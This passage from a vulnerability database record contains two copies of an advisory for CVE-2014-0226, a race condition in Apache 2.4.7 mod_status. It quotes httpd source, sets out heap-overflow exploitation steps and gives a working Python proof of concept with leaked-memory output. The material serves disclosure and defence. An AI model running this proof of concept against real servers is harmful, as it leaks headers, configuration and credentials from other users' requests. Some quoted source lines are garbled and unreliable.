it was overwritten in the loop\r\nby non-zero). Forever... until it hits an unmapped memory or read only\r\narea.\r\n \r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n \r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n \r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n \r\nRace condition described in section 2, may lead to:\r\n \r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. Exploitation\r\n \r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n \r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n \r\n -- cut\r\n #! /usr/bin/env python\r\n \r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n \r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, e:\r\n print e\r\n pass\r\n \r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n \r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n \r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n \r\n -- cut\r\n \r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n \r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... } []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n \r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22451"}], "exploitdb": [{"lastseen": "2016-02-03T20:33:50", "description": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition. CVE-2014-0226. Dos exploit for linux platform", "published": "2014-07-21T00:00:00", "type": "exploitdb", "title": "Apache 2.4.7 mod_status Scoreboard Handling Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0226"], "modified": "2014-07-21T00:00:00", "id": "EDB-ID:34133", "href": "https://www.exploit-db.com/exploits/34133/", "sourceData": "--[ 0. Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n\r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n\r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n\r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. Race Condition\r\n\r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n\r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n\r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n\r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n\r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. The mod_status\r\ncode looks as follows:\r\n\r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n\r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n\r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n\r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? */\r\n 118};\r\n\r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. Let's consider the\r\nfollowing example:\r\n\r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. The ap_pmemdup looks as follows:\r\n\r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n\r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n\r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. \"\"\r\n\r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n\r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 return x;\r\n 1907}\r\n\r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n\r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n\r\nHowever the 's' string may overlap with 'd' i.e.:\r\n\r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n\r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since it was overwritten in the loop\r\nby non-zero). Forever... until it hits an unmapped memory or read only\r\narea.\r\n\r\nPart of the scoreboard.c code which may overwrite the\r\nws_record->request was discovered using a tsan:\r\n\r\n #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)\r\n #2 status_handler\r\n/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839\r\n(mod_status.so+0x0000000044b0)\r\n #3 ap_run_handler ??:0 (exe+0x000000084d98)\r\n #4 ap_invoke_handler ??:0 (exe+0x00000008606e)\r\n #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)\r\n #6 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b143e)\r\n #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #8 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #9 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #10 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #12 :0 (libtsan.so.0+0x00000001b279)\r\n\r\n Previous write of size 1 at 0x7feff2b862b8 by thread T2:\r\n #0 update_child_status_internal scoreboard.c:0\r\n(exe+0x00000004d4c6)\r\n #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)\r\n #2 ap_process_http_async_connection http_core.c:0\r\n(exe+0x0000000b139a)\r\n #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)\r\n #4 ap_run_process_connection ??:0 (exe+0x00000009d156)\r\n #5 process_socket event.c:0 (exe+0x0000000cc65e)\r\n #6 worker_thread event.c:0 (exe+0x0000000d0945)\r\n #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)\r\n #8 :0 (libtsan.so.0+0x00000001b279)\r\n--[ 3. Consequences\r\n\r\nRace condition described in section 2, may lead to:\r\n\r\n - information leak in case when the string returned by\r\nap_escape_logitem is not at the end,\r\n junk after copied bytes may be valuable\r\n - overwriting heap with a user supplied value which may imply code\r\nexecution\r\n--[ 4. Exploitation\r\n\r\n In order to exploit the heap overflow bug it's necessary to get\r\ncontrol over:\r\n\r\n 1) triggering the race-condition bug\r\n 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap\r\n 3) part of 's' which doesn't overlap with 'd' (this string is copied\r\nover and over again)\r\n 4) overwriting the heap in order to get total control over the cpu or\r\nat least modify the\r\n apache's handler code flow for our benefits\r\n--[ 5. Information Disclosure Proof of Concept\r\n\r\n -- cut\r\n #! /usr/bin/env python\r\n\r\n import httplib\r\n import sys\r\n import threading\r\n import subprocess\r\n import random\r\n\r\n def send_request(method, url):\r\n try:\r\n c = httplib.HTTPConnection('127.0.0.1', 80)\r\n c.request(method,url);\r\n if \"foo\" in url:\r\n print c.getresponse().read()\r\n c.close()\r\n except Exception, e:\r\n print e\r\n pass\r\n\r\n def mod_status_thread():\r\n while True:\r\n send_request(\"GET\", \"/foo?notables\")\r\n\r\n def requests():\r\n evil = ''.join('A' for i in range(random.randint(0, 1024)))\r\n while True:\r\n send_request(evil, evil)\r\n\r\n threading.Thread(target=mod_status_thread).start()\r\n threading.Thread(target=requests).start()\r\n\r\n -- cut\r\n\r\nBelow are the information leak samples gathered by running the poc\r\nagainst the\r\ntesting Apache instance. Leaks include i.e. HTTP headers, htaccess\r\ncontent,\r\nhttpd.conf content etc. On a live systems with a higher traffic\r\nsamples should\r\nbe way more interesting.\r\n\r\n $ ./poc.py | grep \"\" |grep -v AAAA | grep -v \"{}\"| grep -v notables\r\n 127.0.0.1 {A} []\r\n 127.0.0.1 {A.01 cu0 cs0\r\n 127.0.0.1 {A27.0.0.1} []\r\n 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0\r\n 127.0.0.1 {A\r\n \u00db []\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ab><br />\r\n 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br\r\n/>\r\n 127.0.0.1 {A0.1.1:19666]</b><br />\r\n 127.0.0.1 {A\u00a7} []\r\n 127.0.0.1 {A cs0\r\n 127.0.0.1 {Adentity\r\n 127.0.0.1 {A HTTP/1.1} []\r\n 127.0.0.1 {Ape: text/html; charset=ISO-8859-1\r\n 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []\r\n 127.0.0.1 {A\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff} []\r\n 127.0.0.1 {Aanilla/htdocs/foo} []\r\n 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []\r\n 127.0.0.1 {A......................................... } []\r\n 127.0.0.1 {A-2014 16:23:30 CEST} []\r\n 127.0.0.1 {Acontent of htaccess\r\n 127.0.0.1 {Aver: Apache/2.4.7 (Unix)\r\n 127.0.0.1 {Aroxy:balancer://mycluster} []\r\nWe hope you enjoyed it.\r\n\r\nRegards,\r\nMarek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466\r\n\r\n\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34133/"}]}
